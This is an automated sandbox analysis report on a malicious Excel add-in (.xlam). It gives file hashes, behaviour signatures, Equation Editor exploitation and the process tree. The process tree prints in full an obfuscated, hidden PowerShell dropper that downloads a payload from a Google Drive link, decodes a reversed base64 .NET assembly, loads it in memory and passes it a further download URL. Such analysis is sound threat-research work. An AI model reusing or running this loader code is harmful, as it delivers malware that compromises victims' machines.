Analysis
-
max time kernel
33s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
18-10-2024 21:04
General
-
Target
c45d31e44d57ed25927e102efcfae85dd155f2496624c3958bdd4076d4e0b386.xlam
-
Size
597KB
-
MD5
b084fdb4d0c9b94ab31e3a762a8ceae9
-
SHA1
40118c7bde4f52645b341ee5dacca239eeb482ef
-
SHA256
c45d31e44d57ed25927e102efcfae85dd155f2496624c3958bdd4076d4e0b386
-
SHA512
c7a0b4175be14c6146a5016bcc733096b68acc1ec1a0c9078e3d8038ca3cb025cbff79ef5a85899a0e1b91c00b3e77086f8af1bf3da0f16030f172ce08dbeb17
-
SSDEEP
12288:YYoYZa3XGB29qpzJjEsC/KW2ZF4wtho8mDYEX4BLKLQ:PRw32XzJjHC/EHtho8mD1X41KM
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://drive.google.com/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G
exe.dropper
https://drive.google.com/uc?export=download&id=17kQITFJZ1tqdqTVyc8JyKCRsAb083F4G
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c45d31e44d57ed25927e102efcfae85dd155f2496624c3958bdd4076d4e0b386.xlam1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\miraclefridaymanager.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJGVOVjpDT01TUEVDWzQsMjYsMjVdLWpPSU4nJykoKCd2ZktpbWFnZVVybCA9IDEyeWh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MScrJzdrUUlURkpaMXRxZHFUVnljOEp5JysnS0NSc0FiMDgzRjRHIDEyeTt2Zkt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW4nKyd0O3ZmJysnS2ltYWdlQnl0ZXMgPSB2Zkt3ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHZmS2ltYWdlVXJsKTt2ZktpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh2ZktpbWFnZUJ5dGVzKTt2ZktzdGFydEZsYWcgPSAxMnk8PEJBU0U2NF9TVEFSVD4+MTJ5O3ZmJysnS2VuZEZsYWcgPSAxMnk8PEJBU0U2NF9FTkQ+PjEyeTt2ZktzdGFydEluZGV4ID0gdmZLaW1hJysnZ2VUZXh0LkluZGV4T2YodmZLc3RhcnRGbGFnKTt2ZktlbmRJbmRleCA9IHZmSycrJ2ltYWdlVCcrJ2V4dC5JbicrJ2RleE9mKHZmS2VuZEZsYWcpO3ZmS3N0YXJ0SW5kZXggLWdlIDAnKycgLWFuJysnZCB2ZktlbmRJbmRleCAnKyctZ3QgdmZLc3RhcnRJbmRleDt2ZktzdGFydEluJysnZGV4ICs9IHZmS3N0YXJ0RmxhZy5MZW5ndGg7dmZLYmFzZTY0TGVuZ3RoID0gdmZLZW5kSW5kZXggLSB2ZktzdGFydEluZGV4O3ZmSycrJ2Jhc2U2NENvbW1hbmQgPSB2ZktpbWFnZVRleHQuU3Vic3RyJysnaW5nKHZmS3N0YXJ0SW5kZScrJ3gsIHZmS2Jhc2U2JysnNExlbmd0aCk7dmZLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAodmZLYmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcicrJ3JhJysneSgpIHFIaSBGb3JFYWNoJysnLU9iamVjdCB7IHZmSycrJ18gfSlbLTEuLicrJy0odmZLYmEnKydzZTY0Q29tbWFuZC5MZW5ndGgpXTt2ZksnKydjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGJysncm9tQmFzZTY0U3RyaW5nKHZmS2Jhc2U2NFJldmVyc2VkKTt2ZksnKydsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmUnKydmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQodmZLY29tbWFuZEJ5dGVzKTt2Zkt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kJysnKDEyeVZBSTEyeSk7dmZLdmFpTWV0aG9kLkludm9rZSh2ZktudWxsLCBAKDEyeXR4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLnJlZ2FuYW1sYWNvbHlhZGlyZi8vOnB0dGgxMnksIDEyeWRlc2F0aXZhZG8xMnksIDEyeWRlJysnc2F0aXZhZG8xMnksIDEyeWRlc2F0JysnaXZhZG8xMnksIDEyeUFkZEluUHJvY2VzczMyMTJ5LCAxMnlkZXNhJysndGl2YWRvJysnMTJ5LCAxMnlkZXMnKydhdGl2YWQnKydvMTJ5KSk7JykuUmVQTEFDZSgncUhpJyxbU1RySW5nXVtjaEFyXTEyNCkuUmVQTEFDZSgndmZLJywnJCcpLlJlUExBQ2UoKFtjaEFyXTQ5K1tjaEFyXTUwK1tjaEFyXTEyMSksW1NUckluZ11bY2hBcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $eNV:COMSPEC[4,26,25]-jOIN'')(('vfKimageUrl = 12yhttps://drive.google.com/uc?export=download&id=1'+'7kQITFJZ1tqdqTVyc8Jy'+'KCRsAb083F4G 12y;vfKwebClient = New-Object System.Net.WebClien'+'t;vf'+'KimageBytes = vfKwebClient'+'.DownloadData(vfKimageUrl);vfKimageText = [System.Text.Encoding]::UTF8.GetString(vfKimageBytes);vfKstartFlag = 12y<<BASE64_START>>12y;vf'+'KendFlag = 12y<<BASE64_END>>12y;vfKstartIndex = vfKima'+'geText.IndexOf(vfKstartFlag);vfKendIndex = vfK'+'imageT'+'ext.In'+'dexOf(vfKendFlag);vfKstartIndex -ge 0'+' -an'+'d vfKendIndex '+'-gt vfKstartIndex;vfKstartIn'+'dex += vfKstartFlag.Length;vfKbase64Length = vfKendIndex - vfKstartIndex;vfK'+'base64Command = vfKimageText.Substr'+'ing(vfKstartInde'+'x, vfKbase6'+'4Length);vfKbase64Reversed = -join (vfKbase64Command.ToCha'+'rAr'+'ra'+'y() qHi ForEach'+'-Object { vfK'+'_ })[-1..'+'-(vfKba'+'se64Command.Length)];vfK'+'commandBytes = [System.Convert]::F'+'romBase64String(vfKbase64Reversed);vfK'+'loadedAssembly = [System.Re'+'flection.Assembly]::Load(vfKcommandBytes);vfKvaiMethod = [dnlib.IO.Home].GetMethod'+'(12yVAI12y);vfKvaiMethod.Invoke(vfKnull, @(12ytxt.968578ttttttsetaldiord/gro.sndkcud.reganamlacolyadirf//:ptth12y, 12ydesativado12y, 12yde'+'sativado12y, 12ydesat'+'ivado12y, 12yAddInProcess3212y, 12ydesa'+'tivado'+'12y, 12ydes'+'ativad'+'o12y));').RePLACe('qHi',[STrIng][chAr]124).RePLACe('vfK','$').RePLACe(([chAr]49+[chAr]50+[chAr]121),[STrIng][chAr]39) )"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD55f76e240faaae7768b2b377168930c2d
SHA1203a4a41a20e53b752f7e5d544cf222aec965c4a
SHA256ba39c40e292d0488a20e525e5f8d543d5abf0d1e12e5cf299b99dd059fdf5349
SHA51272ff7b79b708cedbdff517c7b68ef0c1b1b0bbf3a23a388d5a413c21ab93b726b7362b0b65c73be3c0c6237b594a0f1ab3b363ee655d453dd79605da0deba441
-
Filesize
191KB
MD5228c9eacf2090da44fc3599dffb3d95c
SHA1afec3333348c237707ffb7f3835d0bce6525bf89
SHA256ea14b56c297c3cfb8c268bbfcd7c82342ce44a02281184bfbe3c038de2c8190e
SHA5128e7f330fde1f99a90663bfbd811f9eba83bde18c7d1cb69333fe933287ed5efea377cc90cbcc3eee81a64c36b170e6f8a7b9ecd475f65ca57b766bf2605b9417
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
44KB